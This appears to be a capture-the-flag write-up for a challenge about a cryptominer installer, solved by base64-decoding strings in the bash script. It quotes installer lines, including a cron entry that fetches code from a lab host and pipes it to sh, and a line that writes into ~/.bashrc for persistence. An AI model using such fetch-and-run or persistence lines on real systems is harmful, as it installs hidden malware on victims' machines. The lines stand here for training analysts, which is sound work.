In the race for Vitalium on Mars, the villainous Board of Arodor resorted to desperate measures, needing funds for their mining attempts. They devised a botnet specifically crafted to mine cryptocurrency covertly. We stumbled upon a sample of Arodor’s miner’s installer on our server. Recognizing the gravity of the situation, we launched a thorough investigation. With you as its leader, you need to unravel the inner workings of the installation mechanism. The discovery served as a turning point, revealing the extent of Arodor’s desperation. However, the battle for Vitalium continued, urging us to remain vigilant and adapt our cyber defenses to counter future threats.

Get OSCP Certificate Notes

The Complete Practical Web Application Penetration Testing Course

The challenge shows a very long bash script which has some base64-encoded strings such as the ones below

local url=”http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg==”

dest=$(echo “X3QwX200cnN9Cg==”|base64 -d)

echo “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64 -d >> /home/$USER/.bashrc

echo ‘* * * * * $LDR http://tossacoin.htb/ | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1’

All we have to do is to base64-decode those strings and gather the parts composing the final flag.

$ echo cGFydDI9Il90aDMxcl93NHkiCg== | base64 -d

$ echo “X3QwX200cnN9Cg==”|base64 -d

$ echo “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64 -d

$ echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d

Final Flag


HackTheBox Video Walkthroughs Playlist

About the Author

I create cybersecurity notes, digital marketing notes and online courses. I also provide digital marketing consulting including but not limited to SEO, Google & Meta ads and CRM administration.

View Articles